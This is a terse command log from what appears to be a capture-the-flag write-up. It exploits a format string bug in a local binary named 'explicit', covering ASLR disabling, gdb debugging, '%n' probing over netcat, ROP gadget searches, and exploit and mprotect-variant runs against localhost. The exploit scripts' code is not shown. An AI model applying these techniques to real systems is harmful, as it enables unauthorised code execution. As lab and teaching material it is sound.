# echo 0 > /proc/sys/kernel/randomize_va_space
# ./explicit
# gdb -q -p `ps axuf | grep explicit | head -n 1 | awk '{print $2}'`
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) continue
# nc 127.0.0.1 7070
%n
^C
(gdb) backtrace
(gdb) x/2i 0x0804f96f-0x5
(gdb) quit
# gdb -q -p `ps axuf | grep explicit | head -n 1 | awk '{print $2}'`
(gdb) break *0x806ea80
(gdb) continue
# nc 127.0.0.1 7070
%n
(gdb) x/xw $esp
(gdb) quit
# ./checksec.sh --file explicit
# gdb -q -x rop.py
# readelf --section-headers explicit | grep '\.bss'
# cat exploit.py
# ./exploit.py 127.0.0.1 7070 0xbffff59c
>
Another solution, using mprotect (based on the exploit by @esanfelix)
# ./search_instructions.py /eXPLicit/explicit mov+eax,0x3 int+0x80
# read
# ./search_instructions.py /eXPLicit/explicit mov+eax,0x7d int+0x80
# mprotect
# gdb -q explicit
(gdb) x/10i 0x805ef4a
(gdb) x/10i 0x805fa30
# ./search_instructions.py /eXPLicit/explicit pop pop pop ret
# cat exploit-mprotect.py
# ./exploit-mprotect.py 127.0.0.1 7070 0xbffff59c
>